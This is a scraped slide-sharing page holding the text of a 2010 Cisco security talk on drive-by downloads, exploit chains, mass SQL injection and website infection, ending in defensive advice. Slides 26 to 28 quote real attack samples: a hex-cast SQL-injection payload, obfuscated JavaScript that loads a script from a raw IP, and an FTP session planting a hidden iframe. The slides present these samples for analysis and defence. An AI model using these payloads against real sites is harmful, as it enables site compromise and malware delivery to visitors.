How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 

Dernier (20)

Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 

A Study on the State of Web Security

  • 1. A Study on the State of Web Security Henry Stern Security Investigator Cisco CSIRT © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 1
  • 2. 1.  Hacked While Browsing 2.  Web Exploit Architecture 3.  The Study 4.  Securing your Clients and Servers © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 2
  • 3. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
  • 4. 4 © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 4
  • 5. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 5
  • 6. 6 © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 6
  • 7. •  Let’s see what’s happening behind the scenes © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 7
  • 8. How does a Web Page Work? HTML: Web site “recipe.” Initial HTML retrieval provides “recipe”. Browser then fetches all objects listed in initial HTML “recipe”. Web Resources: The actual ingredients. Retrieved, per the HTML, from any specified location. Includes Images Scripts Executable objects (“plug-ins”) Other web pages © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 8
  • 9. •  URLs in browser: 1 •  HTTP Gets: 162 •  Images: 66 from 18 domains including 5 separate 1x1 pixel invisible tracking images •  Scripts: 87 from 7 domains •  Cookies: 118 from 15 domains •  8 Flash objects from 4 domains © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 9
  • 10. •  Web page HTML is the recipe •  Code snippets are web site ingredients •  The browser will fetch each ingredient •  Each ingredient initiates a HTTP transaction © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 10
  • 11. •  “Application Vulnerabilities Exceed OS Vulnerabilities” •  IE and Firefox vulnerable •  “…hundreds of vulnerabilities in ActiveX controls installed by software vendors have been discovered.” Sources: SANS Top Cyber Security Risks 2007, 2009 http://www.sans.org/top-cyber-security-risks/ © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 11
  • 12. •  Quicktime, Java, Flash, Reader, DirectX •  Explosion of Browser Helper Objects and third-party plug-ins •  Plug-ins are installed (semi) transparently by website. Users unaware an at-risk helper object or plug-in is installed … introducing more avenues for hackers to exploit users visiting malicious web sites. 12 © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 12
  • 13. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 13
  • 14. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 14
  • 15. •  brookeseidl.com registered at eNom 2002 •  63.249.17.64 hosted at Seattle’s ZipCon with 52 other domains Script injected onto web page – one extra ingredient! © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 15
  • 16. •  Browser fetches h.js javascript from tejary.net •  Tejary.net registered 2003 at GoDaddy and hosted on 68.178.160.68 in Arizona •  Registered by Aljuraid, Mr Nassir A in Saudi Arabia •  Tejary.net/h.js calls two remote iframe objects © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 16
  • 17. •  V3i9.cn registered at by On 3/25/09. DNS by mysuperdns.com •  Hosted on 216.245.201.208 at Limestone Networks in Dallas, TX •  Fetched objects include ipp.htm, real.html, real.js 14.htm, 14.Js flash.htm, igg.htm © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 17
  • 18. It all starts with /c.htm loaded from tejary.net, said7.com Real Player Exploit •  /ipp.htm – Real Player exploit CVE-2008-1309 •  2/40 AV anti-virus vendors detect, calls real.html. Includes f#!kyoukaspersky •  /real.htm, /real.js – Real Player exploit CVE-2007-5601 MDAC (Microsoft Data Access Component) Exploit •  /14.htm, /14.js – exploits Exploit-MS06-014 vulnerability in the MDAC functions Flash Exploit •  /swfobject.js – detects flash version and selects according content •  /flash.htm – Flash exploit. 2/40 anti-virus vendors detect •  /igg.htm - ??? Called from /flash.htm for exploit? © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 18
  • 19. •  After successful exploit, malware installed from v3i9.cn •  ce.exe = Gh0st malware Keylogging, web cam monitoring Persistent connection to China: 58.253.68.68 vobe.3322.org © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 19
  • 20. “…Criminals have used the Internet to steal more than $100 million from U.S. banks so far this year and they did it without ever having to draw a gun or pass a note to a teller… …I've seen attacks where there's been $10 million lost in one 24-hour period.” -Shawn Henry FBI Assistant Director, Cyber Division 8 Nov 2010 CBS “60 Minutes” © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 20
  • 21. •  Ce.exe analyzed on Virus Total 31% detection on days 1, 2 48% detection on day 3 •  21% detection for SMS.exe © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 21
  • 22. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 22
  • 23. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 23
  • 24. “By enticing a user to visit a maliciously crafted web page, an attacker may trigger the issue, which may lead to arbitrary code execution.” © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 24
  • 25. •  Lots of legitimate web surfing. •  Our enterprise customers each request millions of pages per day. •  Miscreants tap in to legitimate traffic. •  Advantages: You don’t have to create new things. Piggyback on sites’ reputation, page rank. •  Risk proportional to reward. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 25
  • 26. •  Infected thousands of websites with vulnerable ASP and Cold Fusion pages and MSSQL database. •  Infections persist to this day! •  How? Google hacking + run on anyPOST /somefile.asp ID=123;DECLARE%20@S schema SQL injection. %20NVARCHAR(4000);SET%20@S=CAST (0x4400450043004C004 … 0073006F007200%20AS %20NVARCHAR(4000));EXEC(@S); © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 26
  • 27. •  Victims infected with info stealer by drive-by download. •  Steals FTP credentials from victims. •  Obfuscated javascript code is inserted into any file that contains a <body> tag. •  New victims are infected through victim’s own website. •  Infected sites were de-listed by Google. document.write(unescape(‘Dp%3CscOCrmKfipa0tie%20sa0rDpc%3D4P%2FvI %2F94c30%2EOC2vI474P%2E2%2E1a095vI%2FOCj0yhqueier0yhy%2Ejs%3E <script src=//94.247.2.195/jquery.js></script> %3CDp%2Fsc30cri4Ppc30tDp%3E’).replace(/4P|mKf|0yh|c30|vI|ie|a0|OC|Dp/ g,"")); © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 27
  • 28. [SOCKS 5 header] USER victim PASS a 9-digit secure random password PASV TYPE I RETR //public_html/forum/db/index.htm PASV <iframe src="http://activeware.cn/ind.php" width="1" height="1" TYPE I alt="YTREWQhej2Htyu" STOR style="visibility:hidden;position:absolute”></iframe> //public_html/forum/db/index.htm QUIT Source: Christian Kreibich at ICSI Berkeley © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 28
  • 29. •  Whole website with aggressive SEO uploaded to compromised host. •  Hotlinks to images on legitimate websites. •  GIS queries send users to SEO site instead of image host. •  Links to drive-by download. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 29
  • 30. 30 © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 30
  • 31. •  Malicious banner ads unknowingly served by Google and Microsoft. •  Caused a drive-by download. •  ScanSafe: 10% of hits via Hotmail. Adshufffle.com •  Installed fake AV. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 31
  • 32. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 32
  • 33. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 33
  • 34. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 34
  • 35. •  Phone-home data from thousands of IronPort web proxies. •  Anonymized traffic summaries. •  Web reputation: Bad, Neutral and Good. Default actions: Block, scan, allow. Plus content policies. •  Randomly sampled 1 billion clicks from pool of 3 trillion. •  Used actual action taken by the appliance. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 35
  • 36. Bad; 1% Good; 14% 93% Blocked 1% Blocked Neutral; 85% 3% Blocked © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 36
  • 37. Flash; 2% Other; 9% CSS; 3% Zip; 0% XML; 3% Binary; 3% Video; 5% Image; 45% Javascript; 13% HTML; 17% © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 37
  • 38. 0.90% 0.80% 0.80% 0.70% 0.60% 0.50% 0.40% 0.30% 0.20% 0.17% 0.20% 0.08% 0.07% 0.10% 0.00% Javascript Flash PDF Image Binary © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 38
  • 39. Good: 5% Bad: 21% Neutral: 74% © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 39
  • 40. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 40
  • 41. •  Users Targeted training designed to defend against social engineering. •  Host-level Patch browser and applications. Audit all applications and files on desktops. “Lock down” hosts where applicable. •  Network-level security Reputation and content scanning for all web objects. Secure HTTPS. Usability vs. security: block objects not pages. Active detection of infected users. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 41
  • 42. •  Secure web application development (OWASP). •  Vulnerability assessment before deployment. •  Regular penetration testing. •  Monitor site security and integrity. •  Pay attention to third-party software. •  Consider Web Application Firewall. •  Outbound scanning with AV/Safe Browsing. •  Two-factor authentication. •  IP-based access controls. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 42
  • 43. •  Compliance and auditing. •  Security posture. •  Third-party integration. •  Secondary usage of data. •  Geographical affinity. •  Incident reporting. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 43